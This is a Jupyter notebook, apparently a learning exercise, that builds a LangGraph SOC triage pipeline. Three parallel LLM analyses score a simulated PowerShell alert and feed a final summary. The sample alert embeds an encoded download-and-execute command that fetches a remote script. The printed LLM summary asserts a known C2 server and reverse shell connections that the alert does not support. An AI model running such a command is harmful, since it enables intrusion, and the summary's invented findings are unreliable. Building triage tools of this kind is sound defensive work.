## AI SOC Triage – Parallel Workflow (Learning Version)

This notebook demonstrates a simple parallel AI investigation workflow 
using LangGraph and structured LLM outputs.

The goal is to understand:
- State management
- Parallel nodes (fan-out)
- Aggregation (fan-in)
- Structured response modeling


In [1]:
from langgraph.graph import StateGraph, START, END
from langchain_groq import ChatGroq
from typing import TypedDict, Annotated
from pydantic import BaseModel, Field
from dotenv import load_dotenv
import operator
import os

In [2]:
load_dotenv()

True

In [3]:
model = ChatGroq(
    model="qwen/qwen3-32b",
    api_key=os.getenv("GROQ_API_KEY"),
    temperature=0.1
)

### Define Structured Output Schema

We use Pydantic to enforce structured LLM responses.

Each investigation node returns:
- Explanation
- Risk score (numeric)
- Short reasoning

This ensures consistency and easier aggregation.


In [4]:
class SecuritySchema(BaseModel):
    findings: str = Field(description="Detailed security analysis of the specific domain")
    risk_score: float = Field(description="Risk score from 0 to 10 (10 being critical)", ge=0, le=10)

In [5]:
structured_model = model.with_structured_output(SecuritySchema)

In [6]:
# The "Incident" Data (Simulating a SIEM Alert)
alert_data = """
ALERT: Suspicious PowerShell Execution
Timestamp: 2024-05-20T14:22:01Z
Host: FIN-SRV-04 (Finance Department File Server)
User: svc_backup
Process: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -EncodedCommand SUVYIChOZXctT2JqZWN0IE5ldC5XZWJDbGllbnQpLkRvd25sb2FkU3RyaW5nKCdodHRwOi8vMTAzLjU1LjIuMTgvc2hlbGwucHMnKQ==
Parent Process: cmd.exe
Location: C:\\Windows\\Temp\\
"""

### Define Shared Workflow State

The state object holds:

- The alert being investigated
- Individual risk scores
- Aggregated risk values
- Final decision

All nodes read from and write to this shared state.


In [7]:
class SOCState(TypedDict):

    alert: str
    threat_intel_report: str
    asset_context_report: str
    behavioral_report: str
    final_summary: str
    individual_score: Annotated[list[float], operator.add]
    severity_index: float

### Parallel Investigation Nodes (Fan-Out)

We define multiple independent investigation functions:

- Threat intelligence analysis
- Asset context analysis
- Behavior analysis

Each node:
- Receives the alert
- Calls the LLM
- Returns a structured risk assessment


In [8]:
def investigate_threat_intel(state: SOCState):
    """Checks the indicators (IPs, Commands, Hashes) for known malicious patterns."""
    prompt = f"Analyze the following alert specifically for Threat Indicators (IoCS) and network-based threats: \n {state['alert']}"
    output = structured_model.invoke(prompt)
    return {'threat_intel_report': output.findings, 'individual_score': [output.risk_score]}

def analyze_asset_context(state: SOCState):
    """Analyzes the importance of the host and user involved."""
    prompt = f"Analyze the following alert focusing on Asset Criticality and User Permissions. Is this a sensitive target? \n {state['alert']}"
    output = structured_model.invoke(prompt)
    return {'asset_context_report': output.findings, 'individual_score': [output.risk_score]}

def investigate_behavior(state: SOCState):
    """Analyzes the 'TTPs' (Tactics, Techniques and Procedures) using MITRE ATT&K logic."""
    prompt = f"Analyze the behavior in this alert. Does this look like typical system activity or an attack pattern (e.g. Living off the Land)? \n {state['alert']}"
    output = structured_model.invoke(prompt)
    return {'behavioral_report': output.findings, 'individual_score': [output.risk_score]}


### Risk Aggregation (Fan-In)

After all parallel investigations complete:

- Individual risk scores are collected
- Scores are aggregated
- A final severity index is computed

This step combines multiple perspectives into one decision.


In [9]:
def final_disposition(state: SOCState):
    """Synthesizes the findings into a SOC Manager's report."""
    prompt = (
        f"Base on these three reports, provide a final executive summary and recommended response steps. \n"
        f"Threat Intel: {state['threat_intel_report']}\n"
        f"Asset Context: {state['asset_context_report']}\n"
        f"Behavioral Analysis: {state['behavioral_report']}"
    )
    overall_report = model.invoke(prompt).content
    avg_score = sum(state['individual_score'])/len(state['individual_score'])

    return {'final_summary': overall_report, 'severity_index': avg_score}

### Build the LangGraph Workflow

We construct a StateGraph:

- Entry point
- Parallel branches
- Final aggregation node
- End state

This defines the execution flow.


In [10]:
graph = StateGraph(SOCState)

# Add Nodes
graph.add_node('threat_intel', investigate_threat_intel)
graph.add_node('asset_context', analyze_asset_context)
graph.add_node('behavioral', investigate_behavior)
graph.add_node('final_disposition', final_disposition)

# Define Parallel Edges (Fan-Out)
graph.add_edge(START, 'threat_intel')
graph.add_edge(START, 'asset_context')
graph.add_edge(START, 'behavioral')

# Define Fan-In
graph.add_edge('threat_intel', 'final_disposition')
graph.add_edge('asset_context', 'final_disposition')
graph.add_edge('behavioral', 'final_disposition')

graph.add_edge('final_disposition', END)

# Compile the Graph
workflow = graph.compile()

In [11]:
print(workflow.get_graph().draw_ascii())

                            +-----------+                              
                            | __start__ |*                             
                        ****+-----------+ ****                         
                    ****           *          *****                    
                ****               *               ****                
             ***                   *                   ***             
+---------------+           +------------+           +--------------+  
| asset_context |           | behavioral |           | threat_intel |  
+---------------+***        +------------+         **+--------------+  
                    ****           *          *****                    
                        ****       *      ****                         
                            ***    *   ***                             
                        +-------------------+                          
                        | final_disposition |                   

### Execute the Workflow

We provide a sample alert and run the graph.

The output includes:
- Individual investigation results
- Aggregated risk score
- Final disposition


In [12]:
initial_state = {'alert': alert_data}

result = workflow.invoke(initial_state)

In [13]:
print(f"--- FINAL SEVERITY INDEX: {result['severity_index']}/10 ---\n")

final_report = result['final_summary']

# If the model used <think> tags, we split the string and take the last part
if "</think>" in final_report:
    final_report = final_report.split("</think>")[-1].strip()

print(final_report)

--- FINAL SEVERITY INDEX: 8.5/10 ---

**Executive Summary**  
The Finance Department File Server (FIN-SRV-04), a high-criticality asset handling sensitive financial data, has been compromised through a sophisticated attack leveraging PowerShell-based techniques. Key indicators include:  
1. **Malicious PowerShell Execution**: A suspicious command decoded to download and execute a remote script from a known malicious C2 server (IP: 103.55.2.18), bypassing security policies and using obfuscation.  
2. **Privileged Account Abuse**: The attack exploited the elevated privileges of the service account `svc_backup`, a high-value target for lateral movement or data exfiltration.  
3. **Stealthy Tactics**: Use of temporary directories (`C:\Windows\Temp\`) and hidden windows suggests an attempt to evade detection.  
4. **Network Risks**: Established reverse shell connections and potential lateral movement from the compromised finance server pose immediate threats to data integrity and confidenti

### Learning Reflection

This notebook demonstrates:

- How to orchestrate LLM calls using LangGraph
- How to structure outputs with Pydantic
- How to implement parallel fan-out / fan-in workflows
- How to compute a simple risk aggregation score

This is a learning-focused implementation designed for clarity,
not production optimization.
